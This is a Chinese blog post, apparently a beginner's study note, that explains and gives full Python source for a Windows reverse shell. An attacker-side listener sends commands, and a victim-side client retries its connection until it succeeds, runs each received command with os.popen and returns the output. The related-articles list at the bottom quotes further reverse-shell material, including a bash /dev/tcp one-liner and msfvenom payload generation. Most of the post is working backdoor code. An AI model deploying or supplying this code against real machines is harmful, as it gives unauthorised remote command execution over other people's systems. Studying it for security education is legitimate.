Windows下的反弹shell

最新推荐文章于 2025-06-02 13:29:35 发布
最新推荐文章于 2025-06-02 13:29:35 发布
阅读量8.4k 收藏 9
点赞数 1
CC 4.0 BY-SA版权
文章标签: Windows shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43871760/article/details/88574127
博客主要介绍了反弹shell的相关内容。当服务器端攻击客户端且客户端IP未知时,需使用反向shell。分别给出了服务器端和客户端代码的基本步骤,服务器端要创建套接字、绑定等,客户端要创建套接字、连接服务器等,还提到运行时先开服务器端。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天学习内容就是反弹shell啦~~
当服务器端攻击客户端时,此时客户端IP地址未知,所以要使用反向shell
在这里分别写服务器端代码和客户端代码;注:每次运行时要先开服务器端
服务器端(攻击者,导入模块:import socket)
基本步骤:
1、创建套接字

s=socket.socket()

2、进行绑定(ip:允许连接的ip,服务器端端口)

s.bind(("0.0.0.0",6666))

3、允许连入的主机数

s.listen()

4、创建接口与连入的主机地址

con,addr=s.accept()

具体代码:

import socket

s = socket.socket()
s.bind(('0.0.0.0',6666))
s.listen(5)
con,addr = s.accept()
print(addr)

for i in range(3):
    cmd = input('第%d条命令:'%(i+1))
    con.send(cmd.encode())
    result = con.recv(65536)
    print(result.decode())
con.close()

客户端(被攻击者,导入模块:import socket,import os)
基本步骤:
1、创建套接字,连接服务器(ip:服务器端,端口:服务器端)

s=socket.socket()
s.connect(('127.0.0.1',6666))

2、收发数据

cmd = s.recv(1024).decode()
s.send(result.encode())

3、关闭套接字

s.close()

具体代码:

import os
import time
import socket

s = socket.socket()


while 1:
    try:
        s.connect(('127.0.0.1',6666))
        break
    except:
        time.sleep(5)
        
for i in range(3):
    cmd = s.recv(1024).decode()
    print('收到的第%d条命令'%(i+1),cmd)
    result = os.popen(cmd).read()
    if result:
        s.send(result.encode())
    else:
        if cmd[:2] == 'cd':
            os.chdir(cmd[2:].strip())
        s.send(b'OK!')
        
s.close()

实现效果图:
客户端:
在这里插入图片描述
服务器端:
在这里插入图片描述
enen~~就酱紫

ST小姐姐
关注
Windows反弹shell乱码
墨痕诉清风的博客
04-06 1038
Windows反弹shell乱码
简单易上手!Windows反弹shell实现
weixin_54475173的博客
01-02 596
Windows反弹shell
cmd反弹shell提权
10-24
cmd反弹shell提权
渗透测试-window反弹shell
lza20001103的博客
05-11 5334
window反弹shell
反弹 Shell(Reverse Shell)原理与实战详解
最新发布
chaoqun3的博客
06-02 1502
反弹 Shell 是指被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell;将其所有输出(stdout 和 stderr)发送给攻击者;将攻击者作为输入源(stdin),实现远程控制。核心要点描述反弹 Shell 的本质。
Windows 反弹shell方法
weixin_53747497的博客
07-12 3422
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
python shell反弹shell
WY92139010的博客
03-04 343
python shell反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端,被攻击端是服务端 反弹shell,先启用服务端,再启用客户端 反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行) shell: 客户端:  ...
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 3084
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
Windows反弹Shell
qq_62073002的博客
04-26 1287
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
利用msf在windows反弹shell
Jiajiajiang_的博客
08-08 7270
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
Windows/Linux 下nc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
反弹shell命令
Shanfenglan's blog
10-29 2785
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
cmd 返回值_渗透不会反弹shell?来教你写一个cmd的shell
weixin_39756235的博客
11-20 176
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
渗透不会反弹shell?来教你写一个cmd的shell
蚁景网安学院
02-20 397
渗透不会反弹shell?来教你写一个cmd的shell包含的库:#include <winsock2.h> #include <windows.h> #inclu...
反弹cmd
qq_41861225的博客
01-21 1290
**前言:**我们在学习的过程中经常会听见“反弹shell”一词,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。同理我们也可以自己实现一套反弹cmd的操作。 ...
反弹shell
stonesharp的专栏
04-03 3434
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
CreateProcess 重定向CMD实现反弹shell
hambaga的博客
03-01 498
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。 // RedirectCmd.cpp : Defines the entry point for the console application. // 还原《恶意代码分析实战》第九章练习样本2 #include "stdafx.h" #include <WinSock2.h> #include <Windows.h> #pragma comment(l
windows 反弹shell
07-29
有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值